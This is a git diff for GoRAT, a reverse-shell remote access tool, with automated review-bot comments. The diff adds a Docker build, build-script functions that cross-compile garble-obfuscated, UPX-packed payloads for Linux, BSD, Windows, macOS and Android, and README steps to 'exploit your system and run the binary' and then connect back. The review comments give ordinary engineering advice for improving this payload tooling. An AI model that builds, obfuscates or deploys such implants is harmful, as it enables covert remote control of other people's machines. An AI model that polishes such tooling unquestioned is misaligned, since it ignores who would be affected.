diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..b9cdcfc
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,13 @@
+FROM golang:1.16.6-buster
+RUN apt-get update
+RUN apt-get install -y upx sudo unzip gcc-arm-linux-gnueabihf g++-arm-linux-gnueabihf libc6-armel-cross libc6-dev-armel-cross binutils-arm-linux-gnueabi libncurses5-dev build-essential bison flex libssl-dev bc
+
+# Copy Source Files
+RUN mkdir /GoRAT
+WORKDIR /GoRAT
+COPY . .
+
+# Build Payload
+RUN go mod download -x
+RUN go get mvdan.cc/garble@latest
+RUN ./build_payload.sh -a
diff --git a/README.MD b/README.MD
index cdf79d4..32e478f 100644
--- a/README.MD
+++ b/README.MD
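Review bot: `RUN go get mvdan.cc/garble@latest` resolves the obfuscator to whatever its newest tag is at build time, so every payload produced via `--docker` goes through an unpinned third-party toolchain and two builds of the same commit can differ; pin a specific tag, and on Go 1.16 use the supported form `RUN go install mvdan.cc/garble@<tag>` since `go get` for binaries is deprecated there. `RUN apt-get update` sits in its own layer, so a cached layer can later install from a stale index; fold it into the install as `RUN apt-get update && apt-get install -y --no-install-recommends … && rm -rf /var/lib/apt/lists/*`. `COPY . .` copies the whole checkout, including the `config.sh` the README has the operator fill in, into the `gorat_build` image, and `BuildDocker` later removes only the container, not that image, so a `.dockerignore` or a narrower `COPY` of what `build_payload.sh -a` actually needs is worth adding. The `sudo` package appears to be installed only because `Stage` now calls `sudo rm -rf`; the build already runs as root inside the container, so the dependency could go if the script tolerated its absence.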
@@ -18,27 +18,35 @@ GoRAT(Go Remote Access Tool) is an extremely powerful yet simple reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism. (GoRAT is not anonymous and designed for CTF players, Go enthusiasts, and security experts.)
 ### Supported Distros:
-| 64Bit Distros | 32Bit Distros |
-|---------------------|---------------------|
-| Linux | Linux |
-| FreeBSD | FreeBSD |
-| OpenBSD | OpenBSD |
-| Linux ARM | Linux ARM |
-| FreeBSD ARM | FreeBSD ARM |
-| OpenBSD ARM | OpenBSD ARM |
-| Linux MIPS | Linux MIPS |
-| MacOS | Windows (kinda) |
-| Windows (kinda) | |
-
-# Installing and Building
-
+| 64Bit Distros | 32Bit Distros |
+|---------------------|-------------------------------|
+| Linux | Linux |
+| FreeBSD | FreeBSD |
+| OpenBSD | OpenBSD |
+| Linux ARM | Linux ARM |
+| FreeBSD ARM | FreeBSD ARM |
+| OpenBSD ARM | OpenBSD ARM |
+| Linux MIPS | Linux MIPS |
+| MacOS | (NOT BUILDING) MacOS |
+| Android ARM | (NOT BUILDING) Android ARM |
+| Windows (kinda) | Windows (kinda) |
+
+# Installing and Building Native
 1. Set up a full GoLang build environment
-2. Install [UPX](https://upx.github.io/) and run `go install mvdan.cc/garble`
-3. Fill out `config.sh` and run `./build_payload.sh --garble`
-4. Transfer the `BUILD` folder to your "attacking" machine, install [bc](https://linux.die.net/man/1/bc) and run `./start_server.sh`
-5. Exploit your system and run the binary
-6. Connect to the "target" via normal ssh from the "attacking" machine
+2. Install [UPX](https://upx.github.io/)
+3. Install [Garble](https://github.com/burrowers/garble) with `go get mvdan.cc/garble`
+4. Fill out `config.sh`
+5. Run `./build_payload.sh --all`
+
+# Installing and Building with Docker
+1. Install and start docker
+2. Fill out `config.sh`
+3. Run `./build_payload.sh --docker`
+# Using the Payloads
+1. Transfer the `BUILD` folder to your "attacking" machine, install [bc](https://linux.die.net/man/1/bc) and run `./start_server.sh`
+2. Exploit your system and run the binary
+3. Connect to the "target" via normal ssh from the "attacking" machine
 # Chisel Server Usage
 GoRAT uses the standard release binaries provided by the [chisel project](https://github.com/jpillora/chisel/releases). The server requires a number of configure options and has fairly verbose logging. For this reason a small shell script is provided to start and parse the output of chisel for easy use. To use it, run the following:
@@ -55,7 +63,6 @@ Session #1 | SSH Server Mounted On: 27819
 =============================================
 Session #2 | Control Server Mounted On: 33132
 Session #2 | SSH Server Mounted On: 33133
-
 ```
 # Payload Usage
diff --git a/build_payload.sh b/build_payload.sh
index 023cb20..3843d08 100755
--- a/build_payload.sh
+++ b/build_payload.sh
@@ -13,8 +13,8 @@ COMPILE_CORE="$SRC_DIR/goRAT.go"
 function Stage {
 # Clean Before Stage
- rm -rf $BUILD_DIR
- rm -rf $SRC_DIR
+ sudo rm -rf $BUILD_DIR
+ sudo rm -rf $SRC_DIR
 mkdir $BUILD_DIR
 mkdir $SRC_DIR
 mkdir $BUILD_DIR/scripts
@@ -39,6 +39,25 @@ function ProgressBar {
 printf "\rProgress : [${_fill// /#}${_empty// /-}] ${_progress}%%"
 }
+function BuildDocker {
+ sudo docker build . -t gorat_build
+ ID=$(sudo docker run -d gorat_build)
+ sudo docker cp $ID:/GoRAT/BUILD/payloads $BUILD_DIR
+ sudo docker stop $ID
+ sudo docker rm $ID
+}
+
+function BuildAndroid {
+ echo ""
+ echo "Starting Android Payload Build... (NOT FULLY WORKING)"
+ # Non-Garble Tests
+ ProgressBar 0 2
+ GOOS=android GOARCH=arm64 go build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_android_arm64 "$COMPILE_CORE"
+ ProgressBar 1 2
+ GOOS=android GOARCH=arm GOARM=7 CC=arm-linux-gnueabihf-gcc CGO_ENABLED=1 go build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_android_arm "$COMPILE_CORE"
+ ProgressBar 2 2
+}
+
 function BuildTest {
 # Non-Garble Tests
 ProgressBar 0 6
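Review bot: The new `sudo rm -rf $BUILD_DIR` and `sudo rm -rf $SRC_DIR` in `Stage` are root-privileged recursive deletes on unquoted variables that are assigned outside this hunk, so a value containing spaces or glob characters is split into several deletion targets and an unset value fails noisily at best; write them as `sudo rm -rf -- "${BUILD_DIR:?BUILD_DIR is unset}"` and `sudo rm -rf -- "${SRC_DIR:?SRC_DIR is unset}"`. Presumably `sudo` was added because `docker cp` in `BuildDocker` leaves root-owned files under `$BUILD_DIR`; a comment stating that, e.g. `# sudo: payloads copied out by BuildDocker are root-owned`, would keep the next reader from "simplifying" it away. `Stage` continues past the end of this hunk.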
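Review bot: `BuildDocker` never checks that `sudo docker build . -t gorat_build` succeeded before it runs and copies from the image, so unless the script enables `set -e` somewhere outside this hunk, a failed in-container build silently falls through to whatever `gorat_build` image was previously built and copies stale payloads; chain the steps, e.g. `sudo docker build . -t gorat_build || return 1`, and likewise bail out if `ID=$(sudo docker run -d gorat_build)` comes back empty before it is fed to `docker cp`/`stop`/`rm`. The function also removes only the container, leaving the `gorat_build` image — which holds the copied-in source tree and `config.sh` — on the host; if that is intended, say so in a comment, otherwise add `sudo docker rmi gorat_build`. `BuildAndroid` builds with plain `go build` and no garble or upx, while the `--all` help text promises garbling where possible; a comment on the function such as `# Android builds are plain go build: garble/upx not applied yet` would make the gap explicit.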
@@ -56,106 +75,141 @@ function BuildTest {
 ProgressBar 6 6
 }
-function BuildGarble() {
+function BuildGarble64() {
+ echo ""
+ echo "Starting 64bit Payload Garble..."
+
 ######################
 ## 64 Bit Systems
 ####################
- ProgressBar 0 29
+ ProgressBar 0 15
 GOOS=linux GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_64 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_64 1> /dev/null
- ProgressBar 1 29
+ ProgressBar 1 15
 GOOS=linux GOARCH=arm64 GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM5 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM5 1> /dev/null
- ProgressBar 2 29
+ ProgressBar 2 15
 GOOS=linux GOARCH=arm64 GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM6 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM6 1> /dev/null
- ProgressBar 3 29
+ ProgressBar 3 15
 GOOS=linux GOARCH=arm64 GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM7 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM7 1> /dev/null
- ProgressBar 4 29
+ ProgressBar 4 15
 GOOS=linux GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_mips_64 "$COMPILE_CORE"
 # RIP no UPX for MIPS64
- ProgressBar 5 29
+ ProgressBar 5 15
 GOOS=windows GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_windows_64.exe "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_windows_64.exe 1> /dev/null
- ProgressBar 6 29
+ ProgressBar 6 15
 GOOS=darwin GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_macos_64 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_macos_64 1> /dev/null
- ProgressBar 7 29
+ ProgressBar 7 15
 # RIP no UPX for freebsd
 GOOS=freebsd GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_64 "$COMPILE_CORE"
- ProgressBar 8 29
+ ProgressBar 8 15
 GOOS=freebsd GOARCH=arm64 GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM5 "$COMPILE_CORE"
- ProgressBar 9 29
+ ProgressBar 9 15
 GOOS=freebsd GOARCH=arm64 GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM6 "$COMPILE_CORE"
- ProgressBar 10 29
+ ProgressBar 10 15
 GOOS=freebsd GOARCH=arm64 GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM7 "$COMPILE_CORE"
- ProgressBar 11 29
+ ProgressBar 11 15
 # RIP no UPX for openbsd
 GOOS=openbsd GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_64 "$COMPILE_CORE"
- ProgressBar 12 29
+ ProgressBar 12 15
 GOOS=openbsd GOARCH=arm64 GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM5 "$COMPILE_CORE"
- ProgressBar 13 29
+ ProgressBar 13 15
 GOOS=openbsd GOARCH=arm64 GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM6 "$COMPILE_CORE"
- ProgressBar 14 29
+ ProgressBar 14 15
 GOOS=openbsd GOARCH=arm64 GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM7 "$COMPILE_CORE"
- ProgressBar 15 29
+ ProgressBar 15 15
+}
+
+function BuildGarble32() {
+ echo ""
+ echo "Starting 32bit Payload Garble..."
 ######################
 ## 32 Bit Systems
 ####################
+ ProgressBar 0 14
 GOOS=linux GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_32 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_32 1> /dev/null
- ProgressBar 16 29
+ ProgressBar 1 14
 GOOS=linux GOARCH=mips garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_mips_32 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_mips_32 1> /dev/null
- ProgressBar 17 29
+ ProgressBar 2 14
 GOOS=linux GOARCH=arm GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM5 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM5 1> /dev/null
- ProgressBar 18 29
+ ProgressBar 3 14
 GOOS=linux GOARCH=arm GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM6 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM6 1> /dev/null
- ProgressBar 19 29
+ ProgressBar 4 14
 GOOS=linux GOARCH=arm GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM7 "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM7 1> /dev/null
- ProgressBar 20 29
+ ProgressBar 5 14
 GOOS=windows GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_windows_32.exe "$COMPILE_CORE"
 upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_windows_32.exe 1> /dev/null
- ProgressBar 21 29
+ ProgressBar 6 14
 # RIP no UPX for freebsd
 GOOS=freebsd GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_32 "$COMPILE_CORE"
- ProgressBar 22 29
+ ProgressBar 7 14
 GOOS=freebsd GOARCH=arm GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM5 "$COMPILE_CORE"
- ProgressBar 23 29
+ ProgressBar 8 14
 GOOS=freebsd GOARCH=arm GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM6 "$COMPILE_CORE"
- ProgressBar 24 29
+ ProgressBar 9 14
 GOOS=freebsd GOARCH=arm GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM7 "$COMPILE_CORE"
- ProgressBar 25 29
+ ProgressBar 10 14
 # RIP no UPX for openbsd
 GOOS=openbsd GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_32 "$COMPILE_CORE"
- ProgressBar 26 29
+ ProgressBar 11 14
 GOOS=openbsd GOARCH=arm GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM5 "$COMPILE_CORE"
- ProgressBar 27 29
+ ProgressBar 12 14
 GOOS=openbsd GOARCH=arm GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM6 "$COMPILE_CORE"
- ProgressBar 28 29
+ ProgressBar 13 14
 GOOS=openbsd GOARCH=arm GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM7 "$COMPILE_CORE"
- ProgressBar 29 29
+ ProgressBar 14 14
 }
 # Loop through arguments and process them
 for arg in "$@"
 do
 case $arg in
- -g|--garble)
+
+ -d|--docker)
+ Stage
+ BuildDocker
+ ;;
+
+ -a|--all)
+ Stage
+ BuildGarble64
+ BuildGarble32
+ BuildAndroid
+ Cleanup
+ ;;
+
+ -32|--32bit)
+ Stage
+ BuildGarble32
+ Cleanup
+ ;;
+
+ -64|--64bit)
+ Stage
+ BuildGarble64
+ Cleanup
+ ;;
+
+ -m|--mobile)
 Stage
- BuildGarble
+ BuildAndroid
 Cleanup
 ;;
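Review bot: Every new case arm in the argument loop calls `Stage` first, and `Stage` (earlier in this diff) begins by deleting `$BUILD_DIR`, so `./build_payload.sh -64 -32` wipes the 64-bit payloads before the 32-bit ones are built; either state in the usage text that only one build option is honoured per run, or hoist `Stage`/`Cleanup` out of the per-argument arms so several options can accumulate into one `BUILD`. The `-d|--docker` arm is the only one that omits `Cleanup`; if `$SRC_DIR` has to survive so the host-side `docker build` context is intact, a one-line comment there would make that deliberate rather than accidental. While splitting the function, the context line `GOOS=linux GOARCH=amd64 … _linux_mips_64` was carried into `BuildGarble64` unchanged even though it names a MIPS64 payload and builds for amd64; that predates this commit, but `GOARCH=mips64` is the obvious fix and this was the moment to make it.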
@@ -168,7 +222,10 @@ do
 *)
 echo "usage: build_payload.sh"
 echo ""
- echo " -g, --garble Builds a Garbled Payload for each Arch/Distro Pair"
+ echo " -a, --all Builds all Payloads Garbled If Possible for each Arch/Distro Pair"
+ echo " -32, --32bit Builds a Garbled Payload for each Arch/Distro Pair"
+ echo " -64, --64bit Builds a Garbled Payload for each Arch/Distro Pair"
+ echo " -m, --mobile Builds a Garbled Payload for each Arch/Distro Pair"
 echo " -t, --test Builds a Un-Garbled Payload on 64bit Archs Only"
 echo ""
 ;;
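Review bot: Three of the four new usage lines repeat the identical text `Builds a Garbled Payload for each Arch/Distro Pair`, so `-32`, `-64` and `-m` are indistinguishable to the reader, and the `-m` line is wrong in substance because `BuildAndroid` (earlier in this diff) runs plain `go build` with no garble or upx step. Suggested replacements: `echo " -32, --32bit Builds Garbled Payloads for 32bit Arch/Distro Pairs"`, `echo " -64, --64bit Builds Garbled Payloads for 64bit Arch/Distro Pairs"`, `echo " -m, --mobile Builds Un-Garbled Android ARM/ARM64 Payloads (experimental)"`. The `-d|--docker` option added to the case statement has no usage line at all, so a fourth line such as `echo " -d, --docker Builds all Payloads inside a Docker container"` belongs here too.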